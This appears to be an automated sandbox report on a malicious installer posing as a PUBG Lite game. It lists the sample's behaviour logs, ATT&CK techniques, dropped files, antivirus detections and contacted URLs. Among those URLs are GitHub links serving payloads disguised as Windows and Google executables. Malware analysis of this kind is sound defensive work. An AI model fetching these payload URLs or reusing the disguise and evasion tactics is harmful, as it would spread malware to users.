Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Users\user\Desktop\pubg-lite-pc.exeCode function: GetLocaleInfoW,GetLocaleInfoW,RegCloseKey,1_2_009D28A0
Source: C:\Users\user\Desktop\pubg-lite-pc.exeCode function: 1_2_00A456AD cpuid 1_2_00A456AD
Source: C:\Users\user\Desktop\pubg-lite-pc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: C:\Users\user\Desktop\pubg-lite-pc.exeCode function: 1_2_009EAA20 CreateNamedPipeW,CreateFileW,1_2_009EAA20
Source: C:\Users\user\Desktop\pubg-lite-pc.exeCode function: 1_2_00A467B6 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,1_2_00A467B6
Source: C:\Windows\SysWOW64\msiexec.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\msiexec.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
1
Replication Through Removable Media		12
Windows Management Instrumentation		1
DLL Side-Loading		1
DLL Side-Loading		1
Deobfuscate/Decode Files or Information		OS Credential Dumping1
System Time Discovery		1
Replication Through Removable Media		1
Archive Collected Data		Exfiltration Over Other Network Medium3
Ingress Tool Transfer		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default Accounts1
Native API		Boot or Logon Initialization Scripts12
Process Injection		2
Obfuscated Files or Information		LSASS Memory11
Peripheral Device Discovery		Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth11
Encrypted Channel		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain Accounts12
Command and Scripting Interpreter		Logon Script (Windows)Logon Script (Windows)1
Timestomp		Security Account Manager4
File and Directory Discovery		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration3
Non-Application Layer Protocol		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local Accounts1
PowerShell		Logon Script (Mac)Logon Script (Mac)1
DLL Side-Loading		NTDS146
System Information Discovery		Distributed Component Object ModelInput CaptureScheduled Transfer14
Application Layer Protocol		SIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script21
Masquerading		LSA Secrets41
Security Software Discovery		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.common31
Virtualization/Sandbox Evasion		Cached Domain Credentials1
Process Discovery		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
External Remote ServicesScheduled TaskStartup ItemsStartup Items12
Process Injection		DCSync31
Virtualization/Sandbox Evasion		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
Application Window Discovery		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadow1
System Network Configuration Discovery		Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 681507 Sample: pubg-lite-pc.exe Startdate: 10/08/2022 Architecture: WINDOWS Score: 80 69 github.com 2->69 71 collect.installeranalytics.com 2->71 79 Snort IDS alert for network traffic 2->79 81 Antivirus detection for URL or domain 2->81 83 Antivirus / Scanner detection for submitted sample 2->83 85 Multi AV Scanner detection for submitted file 2->85 9 msiexec.exe 3 35 2->9         started        12 pubg-lite-pc.exe 42 2->12         started        signatures3 process4 file5 41 C:\Windows\Installer\MSIE516.tmp, PE32 9->41 dropped 43 C:\Windows\Installer\MSIA4.tmp, PE32 9->43 dropped 45 C:\Windows\Installer\MSIA27C.tmp, PE32 9->45 dropped 53 12 other files (none is malicious) 9->53 dropped 14 msiexec.exe 44 9->14         started        17 msiexec.exe 3 9->17         started        47 C:\Users\user\AppData\Local\...\shiE676.tmp, PE32+ 12->47 dropped 49 C:\Users\user\AppData\Local\...\MSIE937.tmp, PE32 12->49 dropped 51 C:\Users\user\AppData\Local\...\MSIE7DF.tmp, PE32 12->51 dropped 55 2 other files (none is malicious) 12->55 dropped 20 msiexec.exe 12->20         started        process6 file7 57 C:\Users\user\AppData\Local\...\scr1D28.ps1, Little-endian 14->57 dropped 59 C:\Users\user\AppData\Local\...\pss1D88.ps1, Little-endian 14->59 dropped 61 C:\Users\user\AppData\Local\Temp\shi5E5.tmp, PE32 14->61 dropped 63 C:\Users\user\AppData\Local\Temp\shi4BB.tmp, PE32 14->63 dropped 22 powershell.exe 14->22         started        25 powershell.exe 31 14->25         started        27 powershell.exe 28 14->27         started        29 2 other processes 14->29 65 C:\Users\user\AppData\Local\...\shiEAFA.tmp, PE32 17->65 dropped 67 C:\Users\user\AppData\Local\...\shiE992.tmp, PE32 17->67 dropped 75 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 17->75 77 Bypasses PowerShell execution policy 17->77 signatures8 process9 dnsIp10 73 github.com 140.82.121.4, 443, 49803, 49805 GITHUBUS United States 22->73 31 conhost.exe 22->31         started        33 conhost.exe 25->33         started        35 conhost.exe 27->35         started        37 conhost.exe 29->37         started        39 conhost.exe 29->39         started        process11

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
pubg-lite-pc.exe17%VirustotalBrowse
pubg-lite-pc.exe100%AviraHEUR/AGEN.1223728

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Temp\Common Apps\1.3.5\decoder.dll0%MetadefenderBrowse
C:\Users\user\AppData\Local\Temp\Common Apps\1.3.5\decoder.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\INAE5E9.tmp0%ReversingLabs
C:\Users\user\AppData\Local\Temp\MSIE7DF.tmp0%MetadefenderBrowse
C:\Users\user\AppData\Local\Temp\MSIE7DF.tmp0%ReversingLabs
C:\Users\user\AppData\Local\Temp\MSIE937.tmp0%MetadefenderBrowse
C:\Users\user\AppData\Local\Temp\MSIE937.tmp0%ReversingLabs
C:\Users\user\AppData\Local\Temp\shi4BB.tmp5%MetadefenderBrowse
C:\Users\user\AppData\Local\Temp\shi4BB.tmp0%ReversingLabs
C:\Users\user\AppData\Local\Temp\shi5E5.tmp0%MetadefenderBrowse
C:\Users\user\AppData\Local\Temp\shi5E5.tmp0%ReversingLabs
C:\Users\user\AppData\Local\Temp\shiE676.tmp0%ReversingLabs
C:\Users\user\AppData\Local\Temp\shiE992.tmp5%MetadefenderBrowse
C:\Users\user\AppData\Local\Temp\shiE992.tmp0%ReversingLabs
C:\Users\user\AppData\Local\Temp\shiEAFA.tmp0%MetadefenderBrowse
C:\Users\user\AppData\Local\Temp\shiEAFA.tmp0%ReversingLabs
C:\Windows\Installer\MSI101A.tmp0%ReversingLabs
C:\Windows\Installer\MSI1115.tmp0%ReversingLabs
C:\Windows\Installer\MSI19B2.tmp0%MetadefenderBrowse
C:\Windows\Installer\MSI19B2.tmp0%ReversingLabs
C:\Windows\Installer\MSI1A3F.tmp0%MetadefenderBrowse
C:\Windows\Installer\MSI1A3F.tmp0%ReversingLabs

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
https://go.microsoft.co0%VirustotalBrowse
https://go.microsoft.co0%Avira URL Cloudsafe
https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_mo0%Avira URL Cloudsafe
https://github.githubassets.com/assets/light_high_contrast-290f92f5e867.css0%Avira URL Cloudsafe
https://user-images.githubusercontent.com/2%VirustotalBrowse
https://user-images.githubusercontent.com/0%Avira URL Cloudsafe
https://github.githubassets.com/assets/code-3d7b701fc6eb.css0%Avira URL Cloudsafe
https://github.githubassets.com/assets/dark_high_contrast-1c8575b36644.css0%Avira URL Cloudsafe
https://github.githubassets.com/assets/vendors-node_modules_github_mini-throttle_dist_index_js-node_0%Avira URL Cloudsafe
https://github.githubassets.com/assets/dark_colorblind-5113d2be20b0.css0%Avira URL Cloudsafe
https://github.githubassets.com/assets/light_colorblind-c96add742484.css0%Avira URL Cloudsafe
https://github.githubassets.com/assets/vendors-node_modules_selector-observer_dist_index_esm_js-65030%Avira URL Cloudsafe
http://www.microsoft.c0%Avira URL Cloudsafe
https://github.githubassets.com/assets/vendors-node_modules_stacktrace-parser_dist_stack-trace-parse0%Avira URL Cloudsafe
https://github.githubassets.com/assets/dark-217d4f9c8e70.css0%Avira URL Cloudsafe
https://github.githubassets.com/assets/site-4e265bd187dd.css0%Avira URL Cloudsafe
http://pesterbdd.com/images/Pester.png100%Avira URL Cloudmalware
https://go.micro0%Avira URL Cloudsafe
https://contoso.com/Icon0%Avira URL Cloudsafe
http://tl.s0%Avira URL Cloudsafe
https://github.githubassets.com/assets/light-5178aee0ee76.css0%Avira URL Cloudsafe
https://github.githubassets.com/assets/behaviors-b8d7fb708663.js0%Avira URL Cloudsafe
https://github.githubassets.com/assets/primer-494ab2110a2a.css0%Avira URL Cloudsafe
https://github.githubassets.com/assets/vendors-node_modules_delegated-events_dist_index_js-node_modu0%Avira URL Cloudsafe
https://collect.installeranalytics.comhttp://collect.installeranalytics.comhttps://installeranalytic0%Avira URL Cloudsafe
https://github.githubassets.com/assets/vendors-node_modules_github_filter-input-element_dist_index_j0%Avira URL Cloudsafe
http://crl.microsoft.c0%Avira URL Cloudsafe
https://github.githubassets.com/assets/global-5a9114f3bf45.css0%Avira URL Cloudsafe
https://github.githubassets.com/assets/dark_dimmed-0adfa28f0e68.css0%Avira URL Cloudsafe
https://github.githubassets.com/images/modules/open_graph/github-logo.png0%Avira URL Cloudsafe
https://github.githubassets.com/images/modules/open_graph/github-mark.png0%Avira URL Cloudsafe
http://pesterbdd.com/images/Pester.pngXz0%Avira URL Cloudsafe
https://github.githubassets.com/assets/app_assets_modules_github_behaviors_details_ts-app_assets_mod0%Avira URL Cloudsafe
https://github.githubassets.com/assets/sessions-09e8d6375c3f.js0%Avira URL Cloudsafe
http://cacerts.digice0%Avira URL Cloudsafe
http://tl.symcb.y0%Avira URL Cloudsafe
https://github.githubassets.com/favicons/favicon.png0%Avira URL Cloudsafe
https://contoso.com/License0%Avira URL Cloudsafe
https://github.githubassets.com/assets/dark_tritanopia-2171ea0f078b.css0%Avira URL Cloudsafe
https://github.githubassets.com/assets/github-bbee8e363ed4.css0%Avira URL Cloudsafe
https://freesharesoft.com0%Avira URL Cloudsafe
https://github.githubassets.com/0%Avira URL Cloudsafe
https://github.githubassets.com/assets/app_assets_modules_github_soft-nav_navigate_ts-8afe7373ae82.j0%Avira URL Cloudsafe
http://cacerts.digicert.co0%Avira URL Cloudsafe
https://github.githubassets.com/assets/element-registry-f3ac80dedaa5.js0%Avira URL Cloudsafe
https://contoso.com/0%Avira URL Cloudsafe
https://github.githubassets.com/assets/vendors-node_modules_github_catalyst_lib_index_js-node_module0%Avira URL Cloudsafe
https://github.githubassets.com/assets/light_tritanopia-cdd88f146bf7.css0%Avira URL Cloudsafe
https://github.githubassets.com/assets/vendors-node_modules_lit-html_lit-html_js-e954e8c01c93.js0%Avira URL Cloudsafe
https://github.githubassets.com/assets/app_assets_modules_github_behaviors_task-list_ts-app_assets_m0%Avira URL Cloudsafe
https://github.githubassets.com/images/modules/open_graph/github-octocat.png0%Avira URL Cloudsafe
http://crl.40%Avira URL Cloudsafe
https://github.githubassets.com/assets/vendors-node_modules_github_quote-selection_dist_index_js-nod0%Avira URL Cloudsafe
https://github.githubassets.com/assets/app_assets_modules_github_behaviors_keyboard-shortcuts-helper0%Avira URL Cloudsafe
https://github.githubassets.com/favicons/favicon.svg0%Avira URL Cloudsafe
https://github.githubassets.com/assets/vendors-node_modules_manuelpuyol_turbo_dist_turbo_es2017-esm_0%Avira URL Cloudsafe
https://github.githubassets.com/assets/app_assets_modules_github_behaviors_commenting_edit_ts-app_as0%Avira URL Cloudsafe
https://github.githubassets.com/assets/environment-d927ab3eb595.js0%Avira URL Cloudsafe
https://github.githubassets.com/pinned-octocat.svg0%Avira URL Cloudsafe
http://t1.sym7vk0%Avira URL Cloudsafe
http://crl4.digicert.co0%Avira URL Cloudsafe
https://github.githubassets.com/static/fonts/github/alliance-1.woff20%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
collect.installeranalytics.com
3.227.31.211
truefalse
    		high
    github.com
    		140.82.121.4
    		truefalse
      		high

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      https://github.com/gowgerrie/reborn/raw/main/04/GoogleCrashHandler64.exefalse
        		high
        https://github.com/gowgerrie/reborn/raw/main/04/GoogleCrashHandler.exefalse
          		high
          https://github.com/gowgerrie/reborn/raw/main/04/RuntimeBroker.exefalse
            		high
            https://github.com/gowgerrie/reborn/raw/main/04/dllhost.exefalse
              		high

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              https://github.com/notifications/beta/shelfpowershell.exe, 00000016.00000002.65811395396.000002B411D00000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                https://skills.github.com/powershell.exe, 00000016.00000002.65811395396.000002B411D00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.65762973660.000002B402E75000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  https://stars.github.compowershell.exe, 00000016.00000002.65811395396.000002B411D00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.65762973660.000002B402E75000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    https://go.microsoft.copowershell.exe, 00000007.00000003.65205693106.0000020D996DE000.00000004.00000020.00020000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_mopowershell.exe, 00000016.00000002.65762973660.000002B402E75000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://github.githubassets.com/assets/light_high_contrast-290f92f5e867.csspowershell.exe, 00000016.00000002.65762973660.000002B402E75000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://user-images.githubusercontent.com/powershell.exe, 00000016.00000002.65811395396.000002B411D00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.65762973660.000002B402E75000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 2%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://github.githubassets.com/assets/code-3d7b701fc6eb.csspowershell.exe, 00000016.00000002.65811395396.000002B411D00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.65762973660.000002B402E75000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://github.githubassets.com/assets/dark_high_contrast-1c8575b36644.csspowershell.exe, 00000016.00000002.65762973660.000002B402E75000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://github.githubassets.com/assets/vendors-node_modules_github_mini-throttle_dist_index_js-node_powershell.exe, 00000016.00000002.65811395396.000002B411D00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.65762973660.000002B402E75000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://github.githubassets.com/assets/dark_colorblind-5113d2be20b0.csspowershell.exe, 00000016.00000002.65762973660.000002B402E75000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://api.github.com/_private/browser/statspowershell.exe, 00000016.00000002.65811395396.000002B411D00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.65762973660.000002B402E75000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      https://github.githubassets.com/assets/light_colorblind-c96add742484.csspowershell.exe, 00000016.00000002.65762973660.000002B402E75000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://nuget.org/nuget.exepowershell.exe, 00000007.00000003.65114455500.0000020D82AB8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.65277626545.0000020D915C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.65565812606.0000024656719000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.65805223151.000002B411BBA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.65798855963.000002B411A77000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        https://github.githubassets.com/assets/vendors-node_modules_selector-observer_dist_index_esm_js-6503powershell.exe, 00000016.00000002.65811395396.000002B411D00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.65762973660.000002B402E75000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://github.com/Pester/PesterXzqpowershell.exe, 00000007.00000002.65215310594.0000020D8173D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.65467834048.000002464688E000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          https://github.com/gowgerrie/reborn/raw/main/04/GoogleCrashHandler64.exe#$pubg-lite-pc.exe, 00000001.00000003.64949071105.000000000470E000.00000004.00000800.00020000.00000000.sdmp, pubg-lite-pc.exe, 00000001.00000003.64948702830.000000000470B000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://www.microsoft.cpowershell.exe, 00000011.00000002.65585094097.000002465E6B7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.65590219105.000002465E9B0000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://collect.installeranalytics.compubg-lite-pc.exe, pubg-lite-pc.exe, 00000001.00000003.64943521396.00000000048AC000.00000004.00001000.00020000.00000000.sdmp, pubg-lite-pc.exe, 00000001.00000002.66254569554.000000006D9BB000.00000002.00000001.01000000.00000009.sdmpfalse
                              		high
                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000007.00000002.65210670104.0000020D81561000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.65461290089.00000246466B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.65663197254.000002B401A11000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://github.githubassets.com/assets/vendors-node_modules_stacktrace-parser_dist_stack-trace-parsepowershell.exe, 00000016.00000002.65811395396.000002B411D00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.65762973660.000002B402E75000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://github.githubassets.com/assets/dark-217d4f9c8e70.csspowershell.exe, 00000016.00000002.65762973660.000002B402E75000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://github.githubassets.com/assets/site-4e265bd187dd.csspowershell.exe, 00000016.00000002.65811395396.000002B411D00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.65762973660.000002B402E75000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000007.00000002.65215310594.0000020D8173D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.65467834048.000002464688E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.65673219962.000002B401C3C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.65948499140.0000024B6296C000.00000004.00000800.00020000.00000000.sdmptrue
                                • Avira URL Cloud: malware
                                		unknown
                                http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000007.00000002.65215310594.0000020D8173D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.65467834048.000002464688E000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000007.00000002.65215310594.0000020D8173D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.65467834048.000002464688E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.65673219962.000002B401C3C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.65948499140.0000024B6296C000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://go.micropowershell.exe, 00000011.00000003.65347261407.0000024647AE7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.65721729674.000002B40263C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.65995098808.0000024B63162000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://contoso.com/Iconpowershell.exe, 00000016.00000002.65798855963.000002B411A77000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://tl.spubg-lite-pc.exe, 00000001.00000002.66221989496.0000000005F80000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://github.githubassets.com/assets/light-5178aee0ee76.csspowershell.exe, 00000016.00000002.65762973660.000002B402E75000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://api.github.com/_private/browser/optimizely_client/errorspowershell.exe, 00000016.00000002.65811395396.000002B411D00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.65762973660.000002B402E75000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://github.githubassets.com/assets/behaviors-b8d7fb708663.jspowershell.exe, 00000016.00000002.65811395396.000002B411D00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.65762973660.000002B402E75000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://github.githubassets.com/assets/primer-494ab2110a2a.csspowershell.exe, 00000016.00000002.65811395396.000002B411D00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.65762973660.000002B402E75000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://github.com/gowgerrie/reborn/raw/main/04/GoogleCrashHandler.exeCtrlEvtRemovingRemovingButtonTpubg-lite-pc.exe, 00000001.00000003.64942039930.0000000004770000.00000004.00001000.00020000.00000000.sdmpfalse
                                        		high
                                        https://github.com/Pester/Pesterpowershell.exe, 00000007.00000002.65215310594.0000020D8173D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.65467834048.000002464688E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.65673219962.000002B401C3C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.65948499140.0000024B6296C000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://github.githubassets.com/assets/vendors-node_modules_delegated-events_dist_index_js-node_modupowershell.exe, 00000016.00000002.65762973660.000002B402E75000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://collect.installeranalytics.comhttp://collect.installeranalytics.comhttps://installeranalyticpubg-lite-pc.exe, 00000001.00000003.64943521396.00000000048AC000.00000004.00001000.00020000.00000000.sdmp, pubg-lite-pc.exe, 00000001.00000002.66254569554.000000006D9BB000.00000002.00000001.01000000.00000009.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
